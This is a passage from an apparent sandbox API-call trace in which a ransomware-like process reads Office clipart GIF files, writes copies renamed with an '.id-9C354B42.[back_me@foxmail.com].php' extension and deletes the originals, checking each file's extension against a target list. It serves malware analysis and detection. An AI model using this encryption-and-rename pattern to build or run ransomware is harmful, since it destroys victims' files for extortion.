lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.391] WriteFile (in: hFile=0x1c0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.391] SetEndOfFile (hFile=0x1c0) returned 1 [0053.391] CloseHandle (hObject=0x1c0) returned 1 [0053.392] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.392] SetEndOfFile (hFile=0x1bc) returned 1 [0053.392] CloseHandle (hObject=0x1bc) returned 1 [0053.392] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.393] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif")) returned 1 [0053.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.393] lstrlenW (lpString=".doc") returned 4 [0053.393] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.393] lstrlenW (lpString=".docx") returned 5 [0053.393] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.393] lstrlenW (lpString=".pdf") returned 4 [0053.393] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.393] lstrlenW (lpString=".xls") returned 4 [0053.393] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.393] lstrlenW (lpString=".xlsx") returned 5 [0053.393] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.393] lstrlenW (lpString=".ppt") returned 4 [0053.393] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.393] lstrlenW (lpString=".zip") returned 4 [0053.393] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.393] lstrlenW (lpString=".rar") returned 4 [0053.393] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.393] lstrlenW (lpString=".bz2") returned 4 [0053.393] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.393] lstrlenW (lpString=".7z") returned 3 [0053.394] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.394] lstrlenW (lpString=".dbf") returned 4 [0053.394] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.394] lstrlenW (lpString=".1cd") returned 4 [0053.394] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0053.394] lstrlenW (lpString=".jpg") returned 4 [0053.394] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.394] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=13254) returned 1 [0053.394] CloseHandle (hObject=0x1bc) returned 1 [0053.394] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif")) returned 0x20 [0053.394] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0053.394] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.395] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0053.395] GetLastError () returned 0x0 [0053.395] ReadFile (in: hFile=0x1bc, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x33c6, lpOverlapped=0x0) returned 1 [0053.396] WriteFile (in: hFile=0x1c0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x33d0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x33d0, lpOverlapped=0x0) returned 1 [0053.397] ReadFile (in: hFile=0x1bc, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.397] WriteFile (in: hFile=0x1c0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.397] SetEndOfFile (hFile=0x1c0) returned 1 [0053.398] CloseHandle (hObject=0x1c0) returned 1 [0053.398] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.398] SetEndOfFile (hFile=0x1bc) returned 1 [0053.398] CloseHandle (hObject=0x1bc) returned 1 [0053.399] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.399] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif")) returned 1 [0053.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0053.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0053.399] lstrlenW (lpString=".doc") returned 4 [0053.399] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.399] lstrlenW (lpString=".docx") returned 5 [0053.399] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.399] lstrlenW (lpString=".pdf") returned 4 [0053.399] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.399] lstrlenW (lpString=".xls") returned 4 [0053.399] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.399] lstrlenW (lpString=".xlsx") returned 5 [0053.399] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.399] lstrlenW (lpString=".ppt") returned 4 [0053.399] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0053.399] lstrlenW (lpString=".zip") returned 4 [0053.399] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.399] lstrlenW (lpString=".rar") returned 4 [0053.399] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.399] lstrlenW (lpString=".bz2") returned 4 [0053.399] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.400] lstrlenW (lpString=".7z") returned 3 [0053.400] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0053.400] lstrlenW (lpString=".dbf") returned 4 [0053.400] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0053.400] lstrlenW (lpString=".1cd") returned 4 [0053.400] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0053.400] lstrlenW (lpString=".jpg") returned 4 [0053.400] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.401] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=8582) returned 1 [0053.401] CloseHandle (hObject=0x1bc) returned 1 [0053.401] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif")) returned 0x20 [0053.401] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0053.401] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.401] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0053.402] GetLastError () returned 0x0 [0053.402] ReadFile (in: hFile=0x1bc, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x2186, lpOverlapped=0x0) returned 1 [0053.403] WriteFile (in: hFile=0x1c0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x2190, lpOverlapped=0x0) returned 1 [0053.404] ReadFile (in: hFile=0x1bc, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.404] WriteFile (in: hFile=0x1c0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.404] SetEndOfFile (hFile=0x1c0) returned 1 [0053.405] CloseHandle (hObject=0x1c0) returned 1 [0053.405] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.405] SetEndOfFile (hFile=0x1bc) returned 1 [0053.405] CloseHandle (hObject=0x1bc) returned 1 [0053.406] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.406] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif")) returned 1 [0053.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.406] lstrlenW (lpString=".doc") returned 4 [0053.406] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.406] lstrlenW (lpString=".docx") returned 5 [0053.406] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.406] lstrlenW (lpString=".pdf") returned 4 [0053.406] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.406] lstrlenW (lpString=".xls") returned 4 [0053.406] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.406] lstrlenW (lpString=".xlsx") returned 5 [0053.406] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.406] lstrlenW (lpString=".ppt") returned 4 [0053.406] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.406] lstrlenW (lpString=".zip") returned 4 [0053.406] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.406] lstrlenW (lpString=".rar") returned 4 [0053.406] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.406] lstrlenW (lpString=".bz2") returned 4 [0053.406] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.407] lstrlenW (lpString=".7z") returned 3 [0053.407] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.407] lstrlenW (lpString=".dbf") returned 4 [0053.407] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.407] lstrlenW (lpString=".1cd") returned 4 [0053.407] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.407] lstrlenW (lpString=".jpg") returned 4 [0053.407] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.407] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=4894) returned 1 [0053.407] CloseHandle (hObject=0x1bc) returned 1 [0053.407] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif")) returned 0x20 [0053.407] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0053.407] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.407] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0053.408] GetLastError () returned 0x0 [0053.408] ReadFile (in: hFile=0x1bc, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x131e, lpOverlapped=0x0) returned 1 [0053.410] WriteFile (in: hFile=0x1c0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x1320, lpOverlapped=0x0) returned 1 [0053.410] ReadFile (in: hFile=0x1bc, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.410] WriteFile (in: hFile=0x1c0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.411] SetEndOfFile (hFile=0x1c0) returned 1 [0053.413] CloseHandle (hObject=0x1c0) returned 1 [0053.413] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.413] SetEndOfFile (hFile=0x1bc) returned 1 [0053.414] CloseHandle (hObject=0x1bc) returned 1 [0053.414] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.414] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif")) returned 1 [0053.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.415] lstrlenW (lpString=".doc") returned 4 [0053.415] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.415] lstrlenW (lpString=".docx") returned 5 [0053.415] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.415] lstrlenW (lpString=".pdf") returned 4 [0053.415] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.415] lstrlenW (lpString=".xls") returned 4 [0053.415] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.415] lstrlenW (lpString=".xlsx") returned 5 [0053.415] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.415] lstrlenW (lpString=".ppt") returned 4 [0053.415] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.415] lstrlenW (lpString=".zip") returned 4 [0053.415] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.415] lstrlenW (lpString=".rar") returned 4 [0053.415] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.415] lstrlenW (lpString=".bz2") returned 4 [0053.415] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.415] lstrlenW (lpString=".7z") returned 3 [0053.415] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.415] lstrlenW (lpString=".dbf") returned 4 [0053.415] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.415] lstrlenW (lpString=".1cd") returned 4 [0053.415] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.415] lstrlenW (lpString=".jpg") returned 4 [0053.415] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.416] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=5375) returned 1 [0053.416] CloseHandle (hObject=0x1bc) returned 1 [0053.416] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif")) returned 0x20 [0053.416] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0053.670] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.670] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0054.298] GetLastError () returned 0x0 [0054.298] ReadFile (in: hFile=0x1bc, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x14ff, lpOverlapped=0x0) returned 1 [0054.436] WriteFile (in: hFile=0x1a0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x1500, lpOverlapped=0x0) returned 1 [0054.437] ReadFile (in: hFile=0x1bc, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.437] WriteFile (in: hFile=0x1a0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.437] SetEndOfFile (hFile=0x1a0) returned 1 [0055.325] CloseHandle (hObject=0x1a0) returned 1 [0055.325] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.325] SetEndOfFile (hFile=0x1bc) returned 1 [0055.326] CloseHandle (hObject=0x1bc) returned 1 [0055.326] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0055.326] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif")) returned 1 [0056.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0056.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0056.041] lstrlenW (lpString=".doc") returned 4 [0056.041] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0056.041] lstrlenW (lpString=".docx") returned 5 [0056.041] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0056.041] lstrlenW (lpString=".pdf") returned 4 [0056.041] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0056.042] lstrlenW (lpString=".xls") returned 4 [0056.042] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0056.042] lstrlenW (lpString=".xlsx") returned 5 [0056.042] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0056.042] lstrlenW (lpString=".ppt") returned 4 [0056.042] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0056.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0056.042] lstrlenW (lpString=".zip") returned 4 [0056.042] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0056.042] lstrlenW (lpString=".rar") returned 4 [0056.042] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0056.042] lstrlenW (lpString=".bz2") returned 4 [0056.042] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0056.042] lstrlenW (lpString=".7z") returned 3 [0056.042] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0056.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0056.042] lstrlenW (lpString=".dbf") returned 4 [0056.042] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0056.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0056.042] lstrlenW (lpString=".1cd") returned 4 [0056.042] lstrcmpiW 